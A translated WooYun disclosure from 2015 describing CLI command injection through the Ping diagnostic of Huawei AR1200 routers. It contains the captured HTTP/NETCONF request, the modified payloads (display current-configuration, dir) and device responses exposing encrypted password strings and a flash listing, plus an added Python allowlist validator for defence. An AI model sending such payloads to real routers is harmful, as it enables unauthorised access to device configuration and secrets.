
Vulnerability summary

Defect ID: wooyun-2015-0117671

Title: Huawei AR1200 series router backend arbitrary code execution

Vendor: Huawei Technologies Co., Ltd. (华为技术有限公司)

Author: 1c3z

Submitted: 2015-06-02 11:15

Fixed: 2015-06-06 08:14

Published: 2015-06-06 08:14

Vulnerability type: command execution

Severity: medium

Self-assessed rank: 8

Status: the vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-06-02: details sent to the vendor, awaiting the vendor's handling
2015-06-06: the vendor chose to ignore the vulnerability; details disclosed to the public

Brief description:

The school received a batch of routers, I didn't know how to configure them, so I poked at them a bit.

Detailed description:

The web UI has this feature:
System Management > Diagnostics > Ping

[Screenshot: 选区_045.png]


Captured request:

POST http://192.168.1.119/view/main/config.cgi HTTP/1.1
Host: 192.168.1.119
Connection: keep-alive
Content-Length: 372
Origin: http://192.168.1.119
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/41.0.2272.76 Chrome/41.0.2272.76 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://192.168.1.119/view/main/default.html?Version=1.2
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: HttpWarnFlg=no; AR=AR; ARlanguage=property-zh_CN.js; userName=admin; ResetFlag=0; HttpWarnFlg=no
SessionID=M1iBvH1s0kak71m1qqL4YFpG7iW5dxin&MessageID=280&<rpc message-id="280" xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
<edit-config operation="merge">
<target>
<running/>
</target>
<error-option>stop-on-error</error-option>
<config>
<featurename istop="true" type="cli">
<quit></quit>
<ping>192.168.1.1</ping>
</featurename>
</config>
</edit-config>
</rpc>]]>]]>


Change <ping>192.168.1.1</ping>
to <display>current-configuration</display>
and the response is:

HTTP/1.1 200 OK
Server: AR
Date: tue, 02 jun 2015 10:29:11 GMT
Content-Type: text/xml
Content-Length: 1402
Set-Cookie: HttpWarnFlg=no; AR=AR; ARlanguage=property-zh_CN.js; userName=admin; ResetFlag=0; HttpWarnFlg=no
Connection: Close
<?xml version="1.0"?>
<rpc-reply xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="280">
<ok/>
</rpc-reply>
[V200R005C10SPC500]
#
drop illegal-mac alarm
#
wlan ac-global carrier id other ac id 0
#
pki realm default
enrollment self-signed
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password irreversible-cipher %@%@o~ho0DSI#)c&'+VR0uq2.fN8Hp:0#&|@-6h~GlN!:z~CfN;.%@%@
local-user admin privilege level 3
local-user admin service-type telnet web http
#
firewall zone Local
priority 16
#
interface Ethernet0/0/0
#
interface Ethernet0/0/1
#
interface Ethernet0/0/2
#
interface Ethernet0/0/3
#
interface Ethernet0/0/4
#
interface Ethernet0/0/5
#
interface Ethernet0/0/6
#
interface Ethernet0/0/7
#
interface GigabitEthernet0/0/0
#
interface GigabitEthernet0/0/1
ip address 192.168.1.119 255.255.255.0
#
interface Cellular0/0/0
#
interface Cellular0/0/1
#
interface NULL0
#
snmp-agent local-engineid 800007DB0330D17EED3C03
#
http server enable
http secure-server enable
#
user-interface con 0
authentication-mode password
set authentication password cipher %@%@C;@(!jYWE$qrE5"Q`q>7,7x)$I7.F$3jZ'IHQjB"E^|O7x,,%@%@
user-interface vty 0 4
authentication-mode aaa
#
wlan ac
#
voice
#
diagnose
#
return
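As an added example that is not part of the report and is not Huawei's code: the check below is the kind of server-side allowlist the Ping endpoint would need. It parses the request format captured above (SessionID and MessageID fields followed by a raw NETCONF <rpc> whose <featurename type="cli"> element carries CLI words) and accepts only quit and ping with a literal IP address, rejecting display, dir or any other CLI word. The function names and the make_body helper are assumptions; the body layout and the session values are taken from the captured request. The same parser can run in a reverse proxy in front of the device to log or block requests to config.cgi that carry any other CLI word, which is the practical mitigation while the vendor treats this as the logged-in user's default privilege (the dumped configuration shows the admin account is a privilege-level-3 user with telnet, web and http service types).

```python
"""Server-side allowlist for the AR web UI's Ping diagnostic endpoint.

Added example, not code from the WooYun report or from Huawei. The function
names and the check itself are hypothetical; the request format (form fields
followed by a raw NETCONF <rpc> with <featurename type="cli">) is taken from
the captured request in the report.
"""
import xml.etree.ElementTree as ET
from ipaddress import ip_address

NETCONF_NS = "urn:ietf:params:xml:ns:netconf:base:1.0"
EOM = "]]>]]>"                  # NETCONF 1.0 end-of-message marker
ALLOWED_CLI = {"quit", "ping"}  # the only CLI words the Ping page needs


def make_body(cli_inner: str) -> str:
    """Constructed sample body in the captured request's layout; the caller
    supplies the contents of the <featurename type="cli"> block."""
    return (
        "SessionID=M1iBvH1s0kak71m1qqL4YFpG7iW5dxin&MessageID=280&"
        f'<rpc message-id="280" xmlns="{NETCONF_NS}">'
        '<edit-config operation="merge"><target><running/></target>'
        "<error-option>stop-on-error</error-option><config>"
        f'<featurename istop="true" type="cli">{cli_inner}</featurename>'
        "</config></edit-config></rpc>" + EOM
    )


def extract_rpc(body: str) -> str:
    """Cut the <rpc> document out of the config.cgi form body."""
    start = body.find("<rpc")
    if start < 0:
        raise ValueError("no <rpc> element in request body")
    xml = body[start:]
    if xml.endswith(EOM):
        xml = xml[: -len(EOM)]
    return xml


def cli_commands(rpc_xml: str) -> list:
    """Return (command, argument) pairs from every <featurename type="cli">."""
    root = ET.fromstring(rpc_xml)
    pairs = []
    for feat in root.iter(f"{{{NETCONF_NS}}}featurename"):
        if feat.get("type") != "cli":
            continue
        for child in feat:
            name = child.tag.rsplit("}", 1)[-1]  # strip the namespace prefix
            pairs.append((name, (child.text or "").strip()))
    return pairs


def validate_ping_request(body: str) -> tuple:
    """Accept only 'quit' and 'ping <ip>'; reject anything else the client sends."""
    try:
        pairs = cli_commands(extract_rpc(body))
    except (ValueError, ET.ParseError) as exc:
        return False, f"malformed request: {exc}"
    if not pairs:
        return False, "no CLI command present"
    for name, arg in pairs:
        if name not in ALLOWED_CLI:
            return False, f"CLI word {name!r} is not permitted on the Ping page"
        if name == "ping":
            try:
                ip_address(arg)  # accept only a bare IP literal as the target
            except ValueError:
                return False, f"ping target {arg!r} is not an IP address"
    return True, "ok"


if __name__ == "__main__":
    for inner in ("<quit></quit><ping>192.168.1.1</ping>",
                  "<quit></quit><display>current-configuration</display>",
                  "<dir></dir>"):
        print(inner, "->", validate_ping_request(make_body(inner)))
```

The allowlist is deliberately placed on the device side rather than in the browser page: the web form is only a thin wrapper, and anything the page checks can be bypassed by editing the POST body exactly as the report does.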

Proof of vulnerability:

Sending <dir></dir> in the same position returns:
HTTP/1.1 200 OK
Server: AR
Date: tue, 02 jun 2015 10:30:29 GMT
Content-Type: text/xml
Content-Length: 917
Set-Cookie: HttpWarnFlg=no; AR=AR; ARlanguage=property-zh_CN.js; userName=admin; ResetFlag=0; HttpWarnFlg=no
Connection: Close
<?xml version="1.0"?>
<rpc-reply xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="280">
<ok/>
</rpc-reply>
Directory of flash:/
Idx Attr Size(Byte) Date Time(LMT) FileName
0 -rw- 304,700 Mar 27 2015 15:22:32 sacrule.dat
1 -rw- 3,850 Jun 02 2015 07:30:07 mon_file.txt
2 -rw- 111,630,208 Jun 11 2014 03:05:56 AR1220F-V200R005C10SPC500.cc
3 -rw- 0 Mar 27 2015 15:21:58 brdxpon_snmp_cfg.efs
4 -rw- 694 Mar 30 2015 15:25:26 vrpcfg.zip
5 -rw- 396 Mar 30 2015 15:25:26 private-data.txt
6 drw- - Jun 11 2014 12:28:36 dhcp
7 drw- - Jun 11 2014 12:28:38 security
8 -rw- 1,260 Jun 11 2014 12:29:28 rsa_host_key.efs
9 -rw- 540 Jun 11 2014 12:29:32 rsa_server_key.efs
510,484 KB total (401,132 KB free)

Fix recommendation:

You're the experts..

Copyright notice: please credit the source when reproducing, 1c3z@乌云


Vendor response

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2015-06-06 08:14

Vendor reply:

Thank you to the white hat for your attention to Huawei's security. After confirmation, this permission is the default permission of the logged-in user. It is not a vulnerability.

Latest status:

None yet